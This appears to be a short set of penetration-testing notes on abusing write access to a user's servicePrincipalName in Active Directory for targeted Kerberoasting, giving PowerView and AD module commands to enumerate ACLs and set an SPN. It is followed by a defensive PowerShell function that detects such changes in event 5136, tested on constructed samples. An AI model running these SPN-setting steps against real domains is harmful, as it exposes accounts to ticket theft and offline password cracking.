Abusing Set SPN ACL for Kerberoasting
Enumerate the ACL permissions held by a group (using PowerView_Dev):
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
Check that the user does not already have an SPN:
Get-DomainUser -Identity aduser | select serviceprincipalname
Using Active Directory module:
Get-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalName
Set an SPN for the user (must be unique for the domain):
Set-DomainObject -Identity aduser -Set @{serviceprincipalname='ops/whatever1'}
Using Active Directory module:
Set-ADUser -Identity support1user -ServicePrincipalNames @{Add='ops/whatever1'}
Now follow the same process to get a TGT.
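For defenders, the SPN write shown above is recorded as Security event 5136 on a domain controller when "Audit Directory Service Changes" is enabled and the target object has a matching SACL. The PowerShell below is an added example, not part of the original notes; the function names, account names and the example.local domain are constructed for illustration.

```powershell
# Added example (not from the original notes). All names and sample values are constructed.
# Flags event 5136 records where servicePrincipalName was added to a *user* object.
function Find-UserSpnAddition {
    param([Parameter(Mandatory)][string[]]$EventXml)
    foreach ($raw in $EventXml) {
        $evt = [xml]$raw
        if ($evt.Event.System.EventID -ne '5136') { continue }
        # Flatten the <Data Name="..."> elements into a lookup table.
        $d = @{}
        foreach ($n in $evt.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        $isSpn  = $d['AttributeLDAPDisplayName'] -eq 'servicePrincipalName'
        $isUser = $d['ObjectClass'] -eq 'user'        # computer accounts register SPNs routinely
        $isAdd  = $d['OperationType'] -eq '%%14674'   # "Value Added"
        if ($isSpn -and $isUser -and $isAdd) {
            [pscustomobject]@{
                ChangedBy = $d['SubjectUserName']
                Target    = $d['ObjectDN']
                NewSpn    = $d['AttributeValue']
            }
        }
    }
}

# Hypothetical helper: builds a minimal constructed 5136 record so the check runs offline.
function New-Sample5136 ($Who, $Dn, $Class, $Attr, $Value) {
    $fields = [ordered]@{
        SubjectUserName = $Who; ObjectDN = $Dn; ObjectClass = $Class
        AttributeLDAPDisplayName = $Attr; AttributeValue = $Value; OperationType = '%%14674'
    }
    $data = ($fields.GetEnumerator() |
        ForEach-Object { "<Data Name='$($_.Key)'>$($_.Value)</Data>" }) -join ''
    "<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'>" +
    "<System><EventID>5136</EventID></System><EventData>$data</EventData></Event>"
}

# Constructed sample input: only the first record should be reported.
$events = @(
    New-Sample5136 'rdpuser1' 'CN=aduser,CN=Users,DC=example,DC=local' 'user' 'servicePrincipalName' 'ops/whatever1'
    New-Sample5136 'WEB01$' 'CN=WEB01,CN=Computers,DC=example,DC=local' 'computer' 'servicePrincipalName' 'HTTP/web01.example.local'
    New-Sample5136 'helpdesk1' 'CN=aduser,CN=Users,DC=example,DC=local' 'user' 'description' 'temp account'
)
Find-UserSpnAddition -EventXml $events | Format-Table -AutoSize

# Live use on a domain controller:
# $xml = Get-WinEvent -FilterHashtable @{LogName='Security'; Id=5136} | ForEach-Object { $_.ToXml() }
# Find-UserSpnAddition -EventXml $xml
```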